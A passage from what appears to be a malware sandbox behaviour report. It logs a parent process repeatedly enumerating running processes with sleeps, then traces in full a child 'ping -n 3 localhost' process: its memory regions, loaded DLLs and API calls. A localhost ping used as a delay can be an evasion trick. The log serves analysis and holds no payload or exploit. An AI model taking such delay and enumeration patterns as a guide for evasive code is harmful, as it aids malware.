th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.059] CloseHandle (hObject=0xc4) returned 1 [0178.059] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0178.064] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.128] CloseHandle (hObject=0xbc) returned 1 [0178.128] Sleep (dwMilliseconds=0x12c) [0178.476] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0178.480] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 Process: id = "26" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7ea16760" os_pid = "0xc28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0xbcc" cmd_line = "ping -n 3 localhost" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1665 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1666 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1667 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1668 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1669 start_va = 0x1c0000 end_va = 0x1c7fff entry_point = 0x1c0000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 1670 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1671 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1672 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1673 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1674 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1675 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1676 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1677 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1678 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1679 start_va = 0x400000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1680 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1681 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1682 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1683 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1684 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1685 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1686 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1687 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1688 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1689 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1690 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1691 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1692 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1693 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1694 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1695 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 1696 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1697 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1698 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1699 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1700 start_va = 0x120000 end_va = 0x122fff entry_point = 0x120000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 1701 start_va = 0x130000 end_va = 0x130fff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1702 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1703 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1704 start_va = 0x520000 end_va = 0x111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 1749 start_va = 0x1120000 end_va = 0x13eefff entry_point = 0x1120000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1750 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1751 start_va = 0x13f0000 end_va = 0x146ffff entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 1752 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1753 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1754 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1755 start_va = 0x150000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1841 start_va = 0x15f0000 end_va = 0x162ffff entry_point = 0x0 region_type = private name = "private_0x00000000015f0000" filename = "" Region: id = 1842 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1843 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1882 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1883 start_va = 0x1470000 end_va = 0x14bffff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 1884 start_va = 0x16f0000 end_va = 0x172ffff entry_point = 0x0 region_type = private name = "private_0x00000000016f0000" filename = "" Region: id = 1885 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1895 start_va = 0x1560000 end_va = 0x159ffff entry_point = 0x0 region_type = private name = "private_0x0000000001560000" filename = "" Region: id = 1896 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Thread: id = 36 os_tid = 0xc2c [0100.200] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xafe34 | out: lpSystemTimeAsFileTime=0xafe34*(dwLowDateTime=0x79baf020, dwHighDateTime=0x1d440a9)) [0100.200] GetCurrentProcessId () returned 0xc28 [0100.200] GetCurrentThreadId () returned 0xc2c [0100.200] GetTickCount () returned 0x23f02 [0100.200] QueryPerformanceCounter (in: lpPerformanceCount=0xafe2c | out: lpPerformanceCount=0xafe2c*=15698900171) returned 1 [0100.200] GetModuleHandleA (lpModuleName=0x0) returned 0x1c0000 [0100.201] __set_app_type (_Type=0x1) [0100.201] __p__fmode () returned 0x76b331f4 [0100.201] __p__commode () returned 0x76b331fc [0100.201] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1c2ae1) returned 0x0 [0100.201] __getmainargs (in: _Argc=0x1c50d4, _Argv=0x1c50dc, _Env=0x1c50d8, _DoWildCard=0, _StartInfo=0x1c50e8 | out: _Argc=0x1c50d4, _Argv=0x1c50dc, _Env=0x1c50d8) returned 0 [0100.201] SetThreadUILanguage (LangId=0x0) returned 0x409 [0100.333] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0100.333] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x1c5440 | out: lpWSAData=0x1c5440) returned 0 [0100.338] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0xaf8c4 | out: phkResult=0xaf8c4*=0x58) returned 0x0 [0100.338] RegQueryValueExA (in: hKey=0x58, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0xaf8b8, lpData=0xaf8c0, lpcbData=0xaf8bc*=0x4 | out: lpType=0xaf8b8*=0x0, lpData=0xaf8c0*=0x0, lpcbData=0xaf8bc*=0x4) returned 0x2 [0100.338] RegCloseKey (hKey=0x58) returned 0x0 [0100.338] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0xaf88c*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xaf8b4 | out: ppResult=0xaf8b4*=0x0) returned 11001 [0100.339] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0xaf88c*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xaf8b4 | out: ppResult=0xaf8b4*=0x2346f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x2347b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x2347e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x233a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0100.662] FreeAddrInfoW (pAddrInfo=0x2346f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="剣㉨坙㝵", ai_addr=0x2347b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x2347e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x233a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) [0100.662] Icmp6CreateFile () returned 0x238b40 [0100.818] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x234830 [0100.818] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x23ebb0 [0100.819] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafdb4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0100.819] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0xaf8b4, nSize=0x0, Arguments=0xaf8b0 | out: lpBuffer="XH#") returned 0x19 [0100.819] CharToOemBuffA (in: lpszSrc="\r\nPinging cRh2YWu7 [::1] ", lpszDst=0x234858, cchDstLength=0x19 | out: lpszDst="\r\nPinging cRh2YWu7 [::1] ") returned 1 [0100.819] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.819] _write (in: _FileHandle=1, _Buf=0x234858*, _MaxCharCount=0x19 | out: _Buf=0x234858*) returned 25 [0100.820] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.820] LocalFree (hMem=0x234858) returned 0x0 [0100.820] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0xaf8b8, nSize=0x0, Arguments=0xaf8b4 | out: lpBuffer="XH#") returned 0x18 [0100.820] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x234858, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0100.820] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.820] _write (in: _FileHandle=1, _Buf=0x234858*, _MaxCharCount=0x18 | out: _Buf=0x234858*) returned 24 [0100.820] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.820] LocalFree (hMem=0x234858) returned 0x0 [0100.820] SetConsoleCtrlHandler (HandlerRoutine=0x1c17ca, Add=1) returned 1 [0100.820] Icmp6SendEcho2 (in: IcmpHandle=0x238b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xaf930, DestinationAddress=0x1c55e0, RequestData=0x234830, RequestSize=0x20, RequestOptions=0xaf8e0, ReplyBuffer=0x23ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x23ebb0) returned 0x1 [0100.821] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafdb4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0100.821] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xaf8b8, nSize=0x0, Arguments=0xaf8b4 | out: lpBuffer=" Q#") returned 0x10 [0100.821] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x235120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0100.821] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.821] _write (in: _FileHandle=1, _Buf=0x235120*, _MaxCharCount=0x10 | out: _Buf=0x235120*) returned 16 [0100.822] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.822] LocalFree (hMem=0x235120) returned 0x0 [0100.822] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xaf8bc, nSize=0x0, Arguments=0xaf8b8 | out: lpBuffer="\x10<#") returned 0x9 [0100.822] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x233c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0100.822] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.822] _write (in: _FileHandle=1, _Buf=0x233c10*, _MaxCharCount=0x9 | out: _Buf=0x233c10*) returned 9 [0100.822] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.822] LocalFree (hMem=0x233c10) returned 0x0 [0100.822] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xaf8bc, nSize=0x0, Arguments=0xaf8b8 | out: lpBuffer=" \x8f#") returned 0x2 [0100.822] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x238f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0100.822] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.822] _write (in: _FileHandle=1, _Buf=0x238f20*, _MaxCharCount=0x2 | out: _Buf=0x238f20*) returned 2 [0100.822] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.822] LocalFree (hMem=0x238f20) returned 0x0 [0100.823] Sleep (dwMilliseconds=0x3e8) [0101.892] Icmp6SendEcho2 (in: IcmpHandle=0x238b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xaf930, DestinationAddress=0x1c55e0, RequestData=0x234830, RequestSize=0x20, RequestOptions=0xaf8e0, ReplyBuffer=0x23ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x23ebb0) returned 0x1 [0102.072] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafdb4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0102.072] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xaf8b8, nSize=0x0, Arguments=0xaf8b4 | out: lpBuffer=" Q#") returned 0x10 [0102.072] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x235120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0102.072] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0102.072] _write (in: _FileHandle=1, _Buf=0x235120*, _MaxCharCount=0x10 | out: _Buf=0x235120*) returned 16 [0102.072] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0102.072] LocalFree (hMem=0x235120) returned 0x0 [0102.072] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xaf8bc, nSize=0x0, Arguments=0xaf8b8 | out: lpBuffer="\x10<#") returned 0x9 [0102.072] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x233c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0102.072] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0102.072] _write (in: _FileHandle=1, _Buf=0x233c10*, _MaxCharCount=0x9 | out: _Buf=0x233c10*) returned 9 [0102.072] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0102.072] LocalFree (hMem=0x233c10) returned 0x0 [0102.072] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xaf8bc, nSize=0x0, Arguments=0xaf8b8 | out: lpBuffer=" \x8f#") returned 0x2 [0102.072] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x238f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0102.072] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0102.072] _write (in: _FileHandle=1, _Buf=0x238f20*, _MaxCharCount=0x2 | out: _Buf=0x238f20*) returned 2 [0102.072] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0102.072] LocalFree (hMem=0x238f20) returned 0x0 [0102.072] Sleep (dwMilliseconds=0x3e8) [0103.167] Icmp6SendEcho2 (in: IcmpHandle=0x238b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xaf930, DestinationAddress=0x1c55e0, RequestData=0x234830, RequestSize=0x20, RequestOptions=0xaf8e0, ReplyBuffer=0x23ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x23ebb0) returned 0x1 [0103.329] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafdb4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0103.329] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xaf8b8, nSize=0x0, Arguments=0xaf8b4 | out: lpBuffer=" Q#") returned 0x10 [0103.329] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x235120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0103.329] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0103.329] _write (in: _FileHandle=1, _Buf=0x235120*, _MaxCharCount=0x10 | out: _Buf=0x235120*) returned 16 [0103.329] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0103.329] LocalFree (hMem=0x235120) returned 0x0 [0103.329] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xaf8bc, nSize=0x0, Arguments=0xaf8b8 | out: lpBuffer="\x10<#") returned 0x9 [0103.329] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x233c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0103.329] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0103.329] _write (in: _FileHandle=1, _Buf=0x233c10*, _MaxCharCount=0x9 | out: _Buf=0x233c10*) returned 9 [0103.329] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0103.329] LocalFree (hMem=0x233c10) returned 0x0 [0103.330] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xaf8bc, nSize=0x0, Arguments=0xaf8b8 | out: lpBuffer=" \x8f#") returned 0x2 [0103.330] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x238f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0103.330] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0103.330] _write (in: _FileHandle=1, _Buf=0x238f20*, _MaxCharCount=0x2 | out: _Buf=0x238f20*) returned 2 [0103.330] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0103.330] LocalFree (hMem=0x238f20) returned 0x0 [0103.330] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xaf880, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0103.330] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0xaf850, nSize=0x0, Arguments=0xaf84c | out: lpBuffer="\xd0\x14\x24") returned 0x56 [0103.330] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpszDst=0x2414d0, cchDstLength=0x56 | out: lpszDst="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n") returned 1 [0103.330] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0103.330] _write (in: _FileHandle=1, _Buf=0x2414d0*, _MaxCharCount=0x56 | out: _Buf=0x2414d0*) returned 86 [0103.330] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0103.330] LocalFree (hMem=0x2414d0) returned 0x0 [0103.330] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0xaf860, nSize=0x0, Arguments=0xaf85c | out: lpBuffer="\xe8\x14\x24") returned 0x61 [0103.330] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpszDst=0x2414e8, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n") returned 1 [0103.330] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0103.330] _write (in: _FileHandle=1, _Buf=0x2414e8*, _MaxCharCount=0x61 | out: _Buf=0x2414e8*) returned 97 [0103.330] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0103.330] LocalFree (hMem=0x2414e8) returned 0x0 [0103.330] IcmpCloseHandle (IcmpHandle=0x238b40) returned 1 [0103.504] LocalFree (hMem=0x234830) returned 0x0 [0103.504] LocalFree (hMem=0x23ebb0) returned 0x0 [0103.504] WSACleanup () returned 0 